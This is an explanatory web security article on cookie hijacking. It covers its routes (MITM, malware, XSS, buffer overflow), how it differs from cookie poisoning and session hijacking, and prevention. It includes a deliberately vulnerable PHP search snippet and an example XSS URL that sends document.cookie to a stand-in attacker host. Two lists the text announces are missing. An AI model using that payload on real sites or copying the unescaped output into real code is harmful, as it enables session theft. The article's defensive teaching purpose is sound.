In a cookie hijacking attack, the attacker steals HTTP cookies by eavesdropping on the communication between a user and a web application, gaining access to the user’s computer or web browser data, or gaining access to the web server memory. Attackers can perform cookie hijacking using techniques that include exploiting cross-site scripting (XSS) vulnerabilities, performing man-in-the-middle (MITM) attacks, exploiting buffer overflow vulnerabilities on web servers, or planting malware such as trojans.
Cookie hijacking is often confused with cookie poisoning. In cybersecurity, the term poisoning is used to describe cyberattacks, where a malicious hacker injects malicious content into data while it is being transmitted. The term hijacking, on the other hand, is used for attacks where malicious hackers attempt to access (read) the data being transmitted.
Note that you may see some web resources incorrectly using the term cookie poisoning for all attacks even loosely related to cookies, including various types of session hijacking and even session fixation or brute-force session prediction.
The terms cookie hijacking and session hijacking are closely related but are not the same. Users’ session IDs, which are a common authentication mechanism for web apps, are most often handled using cookies. In these cases, session hijacking uses the same techniques as cookie hijacking. However, some web applications may handle session tokens in a different way, for example, using custom HTTP headers. For these apps, session hijacking attacks would use other techniques than cookie hijacking.
Cookies are also used for other types of functionality than just working with browser sessions, so they may contain sensitive information other than session IDs. While the hijacking techniques for such cookies will be the same as for web session cookies, the attacker may have a very different goal.
There are four main approaches to cookie hijacking: eavesdropping on user communication, gaining access to the user’s computer, gaining access to the user’s browser data, or gaining access to the web server memory used to store cookies.
Cookie hijacking techniques often rely on man-in-the-middle (MITM) attacks. In the simplest case, when traffic is not encrypted, you only need a simple sniffer working in the same local network as the client to monitor network traffic for user connections and perform packet sniffing. This is especially common for public Wi-Fi networks.
If a website or web application uses exclusively encrypted connections, simple cookie sniffing won’t work, but there are other tricks that may be attempted. Some examples include:
In many cases, attackers attempt to infect user computer systems with malware such as trojans for the purpose of obtaining session information. A well-known example of this is the man-in-the-browser attack, where session identifiers are stolen directly from the user’s web browser.
One of the most effective ways for an attacker to obtain access to a cookie is to use a cross-site scripting attack. If your website or web application has an XSS vulnerability, the attacker would start by tricking a user into visiting your vulnerable page through a specially crafted URL (typically through phishing). The victim is then redirected to a page that executes malicious client-side scripts in the client browser. The malicious JavaScript code accesses the user’s cookie and sends it to an attacker-controlled server.
Here is an example of a reflected cross-site scripting (XSS) vulnerability that could be used to steal a user’s cookies:
<?php
if (isset($_GET['search']))
{
$results = search_database($_GET['search']);
echo 'Results for "'.$_GET['search'].'":<br/>';
foreach ($results as $result)
{
echo $result['result']."<br/>";
}
}
?>
An attacker could inject malicious code into the search parameter to send the user’s cookie to a server they control:
http://example.com/search.php?search=<script>document.location='http://bad.example.com/thief.php?data='+document.cookie</script>
The content of cookies may also be accessed by unauthorized parties using buffer overflow attacks. If the web server runs software that is vulnerable to buffer overflow attacks, attackers may be able to read server memory containing data for the most recent cookies.
However, this type of attack is very rare and poses little security risk. Not many applications installed on web servers are vulnerable to buffer overflow, and even if they are, it would be a rare coincidence for a successful attacker to find and recognize cookies for a particular web page in memory data. Note that buffer overflow errors are extremely rare in web applications because most popular languages used to create web applications, such as PHP, Java, and JavaScript, don’t allow direct memory manipulation, so buffer overflows are not possible.
Most cookie hijacking attacks target the user (for example, trojan-based attacks and man-in-the-middle attacks) and have nothing to do with the web application itself. These attacks can only be detected by monitoring user computers and user connections.
However, some cookie hijacking attacks are also made possible by cross-site scripting vulnerabilities. By scanning your web applications to find these vulnerabilities and then fixing the identified issues, you can reduce the risk of cookie hijacking. Read more about how to detect and fix XSS vulnerabilities here.
To help prevent cookie hijacking attacks, follow these recommendations:
Cookie hijacking happens when an attacker gains access to the content of cookies by eavesdropping on the communication between a user and a web application, gaining access to the user’s computer or web browser data, or gaining access to web server memory. Because session management is usually done with cookies, cookie hijacking is often used to steal user session data.
Read more about session hijacking attacks – a category closely related to cookie hijacking.
The risks associated with a successful cookie hijacking attack depend on the content of the cookies. If a session cookie is accessed, the attacker may gain unauthorized access to a user’s web application account. The extent of damage depends entirely on the functionality of the web application and the privileges of the user. For example, if the attacker is able to access an administrative account for a major web application, they may expose large amounts of highly sensitive information useful for identity theft.
Learn more about application security practices that help avoid attacks such as session hijacking.
There is no simple way to prevent all cookie hijacking attacks as an app developer, but you can use encryption to make accessing cookies more difficult. You can even separately encrypt cookie content to make sure that cookie hijacking is not possible even if the attacker gains access to the web server or exploits a cross-site scripting vulnerability.
Read about cross-site scripting (XSS) vulnerabilities that may lead to cookie hijacking.